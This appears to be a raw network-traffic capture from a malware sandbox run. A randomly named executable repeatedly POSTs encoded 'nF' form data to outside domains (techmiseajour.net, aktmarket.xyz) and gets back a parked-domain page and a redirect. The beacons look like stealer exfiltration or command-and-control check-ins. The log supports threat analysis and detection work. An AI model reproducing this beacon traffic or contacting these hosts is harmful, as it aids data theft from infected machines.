Jan 11, 2025 03:50:23.262274027 CET	674	OUT	POST /jytl/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.techmiseajour.net Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 191 Origin: http://www.techmiseajour.net Referer: http://www.techmiseajour.net/jytl/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 6e 46 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 69 6d 4f 5a 31 5a 4b 78 66 63 56 2f 39 63 77 4a 5a 46 62 67 65 39 5a 6c 72 6f 77 35 Data Ascii: nF=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUimOZ1ZKxfcV/9cwJZFbge9Zlrow5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49982	84.32.84.32	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:25.822928905 CET	698	OUT	POST /jytl/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.techmiseajour.net Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 215 Origin: http://www.techmiseajour.net Referer: http://www.techmiseajour.net/jytl/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 6e 46 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 34 48 75 49 31 79 62 76 55 35 5a 77 44 61 57 72 6d 31 42 57 43 7a 33 49 48 4c 47 72 6e 51 55 4d 61 4e 72 70 41 55 75 2f 4f 6e 4c 64 55 63 71 78 37 6b 53 57 6f 67 47 31 34 35 45 58 52 42 49 4b 42 79 38 2f 48 32 7a 47 4c 69 71 75 51 74 4f 38 7a 79 66 6d 47 72 69 4e 2f 34 62 55 58 55 46 48 76 44 37 73 77 68 2f 48 70 33 74 4b 79 64 47 7a 31 43 4a 66 32 62 36 57 75 6a 34 71 4c 2f 50 64 74 6c 33 64 4e 4f 49 55 36 33 4e 4b 46 72 6c 75 46 54 59 79 56 32 52 52 56 4d 4e 77 58 52 71 34 57 6f 6d 62 49 54 6e 67 3d 3d Data Ascii: nF=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOG4HuI1ybvU5ZwDaWrm1BWCz3IHLGrnQUMaNrpAUu/OnLdUcqx7kSWogG145EXRBIKBy8/H2zGLiquQtO8zyfmGriN/4bUXUFHvD7swh/Hp3tKydGz1CJf2b6Wuj4qL/Pdtl3dNOIU63NKFrluFTYyV2RRVMNwXRq4WombITng==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49983	84.32.84.32	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:28.373672009 CET	1711	OUT	POST /jytl/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.techmiseajour.net Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1227 Origin: http://www.techmiseajour.net Referer: http://www.techmiseajour.net/jytl/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 6e 46 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 77 48 75 36 4e 79 61 49 41 35 59 77 44 61 63 4c 6d 4f 42 57 43 55 33 4c 33 78 47 72 36 72 55 50 69 4e 71 4f 6f 55 6f 4c 36 6e 42 64 55 63 6a 52 37 6c 50 6d 70 30 47 32 42 79 45 55 35 42 49 4b 42 79 38 39 76 32 69 54 6e 69 73 75 51 75 4a 38 7a 75 62 6d 47 54 69 4e 6e 43 62 58 37 69 46 33 50 44 37 4d 41 68 39 30 42 33 6c 4b 79 66 46 7a 31 4b 4a 66 7a 62 36 56 61 46 34 70 57 71 50 65 4e 6c 32 4b 6b 36 4e 45 75 77 55 4c 70 56 6c 39 74 6b 63 46 64 2f 63 78 77 4a 43 77 6a 62 70 70 62 32 6a 5a 52 65 78 6d 7a 6b 4c 64 45 44 51 32 7a 63 34 6a 51 48 73 33 38 4c 56 62 35 6a 6f 42 75 70 73 6a 50 79 58 33 2b 78 6c 32 34 65 2b 76 4e 62 69 45 70 62 45 53 77 44 71 4e 72 31 59 79 42 56 31 43 31 71 38 77 69 2b 57 59 7a 50 59 6e 46 4d 52 36 6b 73 71 37 36 31 34 75 39 34 2b 61 2b 30 63 68 67 67 6b 66 63 4b 38 59 73 34 54 4e 7a 66 50 57 73 35 42 41 51 72 59 69 39 4b 5a 72 70 78 51 34 37 [TRUNCATED] Data Ascii: nF=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOGwHu6NyaIA5YwDacLmOBWCU3L3xGr6rUPiNqOoUoL6nBdUcjR7lPmp0G2ByEU5BIKBy89v2iTnisuQuJ8zubmGTiNnCbX7iF3PD7MAh90B3lKyfFz1KJfzb6VaF4pWqPeNl2Kk6NEuwULpVl9tkcFd/cxwJCwjbppb2jZRexmzkLdEDQ2zc4jQHs38LVb5joBupsjPyX3+xl24e+vNbiEpbESwDqNr1YyBV1C1q8wi+WYzPYnFMR6ksq7614u94+a+0chggkfcK8Ys4TNzfPWs5BAQrYi9KZrpxQ47mY3YLKnfCjYv7fSat8iak0Pr8AxbUImIcM977stc20RdlKeCvQgibYy+cm2kgNBFyaDq7wh7j+unGcypBTaRYnVkfDe/CSf82w5cwytj6ZH6pjm1TOexkOZv22OVf7HRfosuoMcvVSLcWQG8ucE4LgK27667FJwgHZHoWMzUMilQkES06Ik1xo61YATMvIU4yQiwx+/axCc+qw/C7WP7UOuifR0zKKMDq3fbRYd3qteAdXodldeU0lZTodDf0KqJjlI3KBnOiyZf6CQsHjHZYG/GSa66BLaeToUemcHq19rkYKH2APnAYx+elGUczF8E5iJX4HL+DtsMUjVD8sTTHgAzWu0A4WUpeNNqtmS4+jDbviDLy2wXoffaOpw0xhXMfA8GE2XozKSJpiq03YQTb6WOMaOuxm7lpXnPNCnxMqmeN2JHe+auGnqwBfVw0M1qo6/bgGMk5imA8+YmVqH0VVXxxPr6Trhzr0usNvS3xHFnvtj5ct7Zr2WSuMccb4xP75kbJh4DqIhTpiy337Hz1QirwiIRRGpZe/xn8Cp6ab/Lax1yE/9AssSa950hIIiUionUH7VZM1RUPX3TTSmNzg1ISFz8JMLJkd0utV5qTylz0gsInPeWsYbrRwYaTFC3QlqC/oPCMRJgZaWLiH3lTNOnnbks1l+vOj [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49984	84.32.84.32	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:30.912970066 CET	407	OUT	GET /jytl/?nF=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4EtQbsAD1NVMwB3NTJxV3YfkG6sDZmQ==&JHJt=itqtMr9H_JJ83L HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Host: www.techmiseajour.net Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Jan 11, 2025 03:50:31.360761881 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:50:31 GMT Content-Type: text/html Content-Length: 9973 Connection: close Vary: Accept-Encoding Server: hcdn alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 04ff5ea41e377b6ea1144fef3e0e7d2d-bos-edge4 Expires: Sat, 11 Jan 2025 02:50:30 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
Jan 11, 2025 03:50:31.360929966 CET	1236	IN	Data Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
Jan 11, 2025 03:50:31.360941887 CET	448	IN	Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
Jan 11, 2025 03:50:31.361268044 CET	1236	IN	Data Raw: 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e Data Ascii: ;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.section-title{color:#2f1c6a;fo
Jan 11, 2025 03:50:31.361278057 CET	1236	IN	Data Raw: 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 Data Ascii: }.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><scrip
Jan 11, 2025 03:50:31.361980915 CET	1236	IN	Data Raw: 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 75 73 65 72 73 22 3e 3c 2f 69 3e 20 41 66 66 69 6c 69 61 74 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 68 70 61 Data Ascii: a-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div
Jan 11, 2025 03:50:31.361993074 CET	1236	IN	Data Raw: 6f 75 72 20 77 65 62 73 69 74 65 20 74 6f 20 61 6e 79 20 6f 66 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 73 2e 20 46 6f 6c 6c 6f 77 20 74 68 65 20 61 72 74 69 63 6c 65 20 62 65 6c 6f 77 20 74 6f 20 61 64 64 20 79 6f 75 72 20 64 6f 6d Data Ascii: our website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a websit
Jan 11, 2025 03:50:31.362751007 CET	1236	IN	Data Raw: 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 22 29 7d 7d 3b 76 61 72 20 6f 3d 33 36 2c 72 3d 32 31 34 37 34 38 33 36 34 37 3b 66 75 6e 63 74 69 6f 6e 20 65 28 6f 2c 72 29 7b 72 65 74 75 72 6e 20 6f 2b 32 32 2b 37 35 2a 28 6f 3c 32 36 29 2d 28 28 30 21 3d Data Ascii: urn e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75(o<26)-((0!=r)<<5)}function n(r,e,n){var t;for(r=n?Math.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36r/(r+38))}this.decode=f
Jan 11, 2025 03:50:31.362762928 CET	1212	IN	Data Raw: 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 3b 61 26 26 28 77 3d 74 68 69 73 2e 75 74 66 31 36 2e 64 65 63 6f 64 65 28 74 29 29 3b 76 61 72 20 76 3d 28 74 3d 74 68 69 73 2e 75 74 66 31 36 2e 64 65 63 6f 64 65 28 74 2e 74 6f 4c 6f 77 Data Ascii: i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49985	13.248.169.48	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:36.417176008 CET	662	OUT	POST /wb7v/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.aktmarket.xyz Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 191 Origin: http://www.aktmarket.xyz Referer: http://www.aktmarket.xyz/wb7v/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 6e 46 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 39 7a 73 4f 2b 62 6d 4f 55 43 6d 73 6e 58 75 67 55 31 2f 77 58 48 36 61 55 45 66 63 34 36 68 45 44 74 52 2f 57 54 4a 58 51 30 56 57 57 63 59 56 75 57 58 63 33 71 6b 4a 33 4c 72 59 44 6f 47 4a 79 79 4d 31 65 68 6f 54 48 4d 46 50 58 75 39 5a 31 73 37 65 46 54 55 64 6f 32 2f 34 30 7a 46 6f 67 66 66 4a 72 66 6f 6d 74 68 74 51 68 37 35 48 76 63 6f 6d 4b 58 6d 34 68 39 65 55 54 2b 66 6d 55 55 31 75 4d 66 71 6a 51 42 38 4f 35 6a 77 71 44 68 72 33 70 63 75 34 4a 6c 78 58 65 69 4a 74 66 64 72 74 54 62 4c 44 44 75 31 36 39 7a 7a 4e Data Ascii: nF=FCc6E16lz2LQ9zsO+bmOUCmsnXugU1/wXH6aUEfc46hEDtR/WTJXQ0VWWcYVuWXc3qkJ3LrYDoGJyyM1ehoTHMFPXu9Z1s7eFTUdo2/40zFogffJrfomthtQh75HvcomKXm4h9eUT+fmUU1uMfqjQB8O5jwqDhr3pcu4JlxXeiJtfdrtTbLDDu169zzN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49986	13.248.169.48	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:38.964422941 CET	686	OUT	POST /wb7v/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.aktmarket.xyz Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 215 Origin: http://www.aktmarket.xyz Referer: http://www.aktmarket.xyz/wb7v/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 6e 46 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 73 52 45 44 4e 68 2f 59 79 4a 58 41 6b 56 57 4f 4d 59 4d 6b 32 58 62 33 71 70 30 33 4b 58 59 44 6f 43 4a 79 79 38 31 65 51 6f 51 57 4d 46 4a 43 65 39 62 74 4d 37 65 46 54 55 64 6f 32 37 65 30 7a 64 6f 68 76 76 4a 72 2b 6f 70 67 42 73 69 32 4c 35 48 2b 4d 6f 69 4b 58 6e 43 68 38 53 79 54 39 33 6d 55 51 6c 75 4d 75 71 6b 62 42 38 49 39 6a 78 6e 4d 45 53 7a 78 73 2b 6f 54 7a 70 4b 4a 43 56 47 63 38 57 71 43 4b 71 55 51 5a 70 30 7a 31 47 6e 77 55 6e 30 48 79 52 34 44 4c 75 5a 6a 6d 51 57 42 75 78 72 41 51 3d 3d Data Ascii: nF=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4sREDNh/YyJXAkVWOMYMk2Xb3qp03KXYDoCJyy81eQoQWMFJCe9btM7eFTUdo27e0zdohvvJr+opgBsi2L5H+MoiKXnCh8SyT93mUQluMuqkbB8I9jxnMESzxs+oTzpKJCVGc8WqCKqUQZp0z1GnwUn0HyR4DLuZjmQWBuxrAQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49987	13.248.169.48	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:41.511157036 CET	1699	OUT	POST /wb7v/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.aktmarket.xyz Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1227 Origin: http://www.aktmarket.xyz Referer: http://www.aktmarket.xyz/wb7v/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 6e 46 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 76 78 45 43 2b 70 2f 58 78 68 58 44 6b 56 57 48 73 59 4a 6b 32 58 47 33 71 78 77 33 4b 61 74 44 72 71 4a 6a 67 30 31 59 6a 77 51 50 63 46 4a 64 4f 39 59 31 73 37 50 46 54 6b 52 6f 32 4c 65 30 7a 64 6f 68 73 33 4a 73 76 6f 70 69 42 74 51 68 37 35 39 76 63 6f 61 4b 58 65 67 68 38 57 45 54 4e 58 6d 58 78 4a 75 66 73 53 6b 57 42 38 4b 36 6a 77 30 4d 45 57 38 78 73 79 65 54 7a 30 58 4a 41 46 47 4d 62 48 72 59 34 71 79 4a 76 35 70 35 33 75 37 79 43 76 58 43 43 55 59 4a 34 69 2f 36 43 5a 32 49 75 70 75 54 59 53 70 51 37 6b 4a 57 72 4e 35 6d 69 63 78 37 69 43 6c 6c 70 47 46 78 33 4b 42 2b 72 4e 75 6a 4e 47 56 7a 2f 31 6b 31 34 76 47 2b 42 33 71 74 31 41 58 72 55 42 56 66 66 79 62 74 30 61 6d 44 4f 34 73 50 49 4c 63 61 6d 79 54 32 73 38 30 56 54 71 51 46 44 79 50 68 59 61 39 70 4d 63 31 4a 46 45 48 6a 6e 64 54 6b 78 64 39 63 68 39 65 39 53 6d 75 34 70 6b 6a 47 7a 4d 4d 62 5a 4c [TRUNCATED] Data Ascii: nF=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4vxEC+p/XxhXDkVWHsYJk2XG3qxw3KatDrqJjg01YjwQPcFJdO9Y1s7PFTkRo2Le0zdohs3JsvopiBtQh759vcoaKXegh8WETNXmXxJufsSkWB8K6jw0MEW8xsyeTz0XJAFGMbHrY4qyJv5p53u7yCvXCCUYJ4i/6CZ2IupuTYSpQ7kJWrN5micx7iCllpGFx3KB+rNujNGVz/1k14vG+B3qt1AXrUBVffybt0amDO4sPILcamyT2s80VTqQFDyPhYa9pMc1JFEHjndTkxd9ch9e9Smu4pkjGzMMbZLV9rnpR+Uuab1yf6YRExCUtr8K+v5Nd67JyY9fSefxi7piYh0Wu3I4WDHuNTkLMzayTPIo8lxW/PQbhMuT4hgqKvFeIueKyAB8mJy64SO5Ip68TFRi+90HleazodkrtNVWBiWa3iz6rNFbVnfssN5PJghs38Sh5pVYTef351PskmIUQvnZO/ht05QyrQru/6WKmhmI9aM0l5qcSpo2+yYEsAblRDFfCSHImeybfHfNf9WGBc3lRF4F7Ih01nG5Hx0YgQDwDpqj953X5JsUan0DEz7emyvDFY5JoUvklFMvn6+YonijTfwtuX+aWtQQN7dyvi5WuQsYKUpnBsGCWiMkC9HrS+8SOYZLsx+RzQ60h0+EUI9NyzHoFMFp7RO0e5YTCCw8pitRUOiHg0Pnk7/DYwIzCrEf1h3HjzfNb4Hb4gJgooYigaEB+GJkoZTFQ22ftjQJJLAWI86ZFdFvcpYKDT3A0muqCHO8iO2ivvHFZFyuEp2suvA/8BpK1q9ufMF7hePqPJRdgylh5mps7isHEwKqLgN/P0XiYMxi+vRi/jr0SfELVMD4zhOP8pZTiFcbadf1XCWMUZ9+5Cs6mQAvxY8x1T+bAPxllSrGFZIOWslnoy06L/zcjV8cVL+HmJaM8DR7e6K3DTE4sNwbCts+m3N/W5DaFkOcC [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49988	13.248.169.48	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:44.053711891 CET	403	OUT	GET /wb7v/?nF=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNPegpUt0XvvntMHYRmRLx72hcusnuxA==&JHJt=itqtMr9H_JJ83L HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Host: www.aktmarket.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Jan 11, 2025 03:50:44.505316973 CET	375	IN	HTTP/1.1 200 OK content-type: text/html date: Sat, 11 Jan 2025 02:50:44 GMT content-length: 254 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 46 3d 49 41 30 61 48 41 4b 66 77 31 44 49 37 42 63 59 35 37 2f 52 61 43 4f 32 70 58 79 41 47 30 62 49 4a 68 69 6f 5a 67 72 44 67 74 70 72 56 2b 64 46 65 41 35 31 64 32 34 2f 42 73 77 52 6b 7a 7a 59 39 64 56 6b 71 61 36 6c 50 37 71 6f 2f 53 45 39 5a 42 77 4e 50 65 67 70 55 74 30 58 76 76 6e 74 4d 48 59 52 6d 52 4c 78 37 32 68 63 75 73 6e 75 78 41 3d 3d 26 4a 48 4a 74 3d 69 74 71 74 4d 72 39 48 5f 4a 4a 38 33 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nF=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNPegpUt0XvvntMHYRmRLx72hcusnuxA==&JHJt=itqtMr9H_JJ83L"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
